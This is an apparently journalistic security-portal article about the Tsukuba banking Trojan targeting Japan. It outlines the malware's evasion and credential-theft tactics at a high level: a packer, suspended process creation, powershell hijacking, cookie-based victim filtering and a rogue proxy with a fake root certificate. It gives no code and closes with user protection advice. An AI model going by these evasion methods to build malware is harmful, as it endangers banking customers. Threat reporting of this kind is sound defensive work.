New Banking Trojan Targets Japan, Proves Simplicity Is Still Effective

Researchers at IBM Trusteer recently discovered a new banking Trojan which has been dubbed Tsukuba. This relatively simple, but effective example of financial malware is a part of the ‘proxy changers’ family that uses social engineering techniques to harvest victims’ online banking credentials and other personal information. In a recent blog post about Tsukuba, researchers explain that the malware operates using a three part process.

First, Tsukuba is packed in a payload program (also known as a packer) that resists debugging and analysis by common antivirus tools. This payload is then distributed via regular spam campaigns. When a victim opens a spam email containing Tsukuba, the packer uses a suspended state flag to employ the CreateProcess API. This makes it difficult for Windows to detect the malicious installation. This process also makes it nearly impossible for security researchers to attach a debugging program to Tsukuba while it’s running.

This malware variant also disguises itself while communicating with C&C servers and while downloading additional files and components as needed. It accomplishes this by hijacking a legitimate Windows process (powershell.exe). By using this process, Tsukuba further avoids detection by common anti-malware tools.

During the installation process, the malware also scans the target machine’s browser cookies in search of specific URLs that are relevant to the hackers behind the attack. Only if the infected PC contains URLs actively being targeted by the cybercriminals behind the campaign will installation of Tsukuba continue. This tactic also keeps the malware “under the radar” because it doesn’t complete the installation when it isn’t necessary. This low profile makes it more difficult to detect. Finally, the malware registers a fake root certificate so it can browse malicious pages using its own rogue proxy server. This is why Tsukuba is considered part of the proxy changing family of malware.

Banking trojan attacks Japan

What makes this malware variant so dangerous is that once the rogue proxy has been initiated, the hackers can control what IPs are allowed through the Trojan’s custom social engineering zones. In this case, only Japanese IPs are allowed through and because these users aren’t accustomed to seeing Trojan attacks in their region (compared to English-speaking countries), they are more vulnerable to falling victim to social engineering and phishing campaigns designed to steal their personal and financial data. That said, the fact that the attacks can be targeted by IP address after filtering out victims based on browsing habits during the installation process means that a similar technique could be nearly as effective in other countries including the United States.

What Tsukuba proves is that by carefully combining a bunch of techniques that are considered antiquated within the PC security field in the “right” way, a powerful malware variant can be created that is capable of circumventing most anti-malware security measures and could be responsible for millions of dollars in potential losses.

The best way to protect yourself from Tsukuba is to keep your PC updated at all times and to avoid opening any unsolicited emails that could be packed with a Tsukuba payload. Also, refrain from providing any personal or financial data via a Web browser as this could be part of a social engineering scam designed to hijack your personal data. Remember that your bank or other financial institution will never ask for passwords, account numbers, or similar information as the legitimate financial institution already has this information on file.

▼ Show Discussion

About the author:

Karolis Liucveikis

Karolis Liucveikis - experienced software engineer, passionate about behavioral analysis of malicious apps.

Author and general operator of PCrisk's "Removal Guides" section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over five years working in this branch. He attended KTU University and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications. Contact Karolis Liucveikis.

PCrisk security portal is brought by a company RCS LT. Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.

Our malware removal guides are free. However, if you want to support us you can send us a donation.

About PCrisk

PCrisk is a cyber security portal, informing Internet users about the latest digital threats. Our content is provided by security experts and professional malware researchers. Read more about us.

Malware activity

Global malware activity level today:

Medium threat activity

Increased attack rate of infections detected within the last 24 hours.

Virus and malware removal

This page provides information on how to avoid infections by malware or viruses and is useful if your system suffers from common spyware and malware attacks.

Learn about malware removal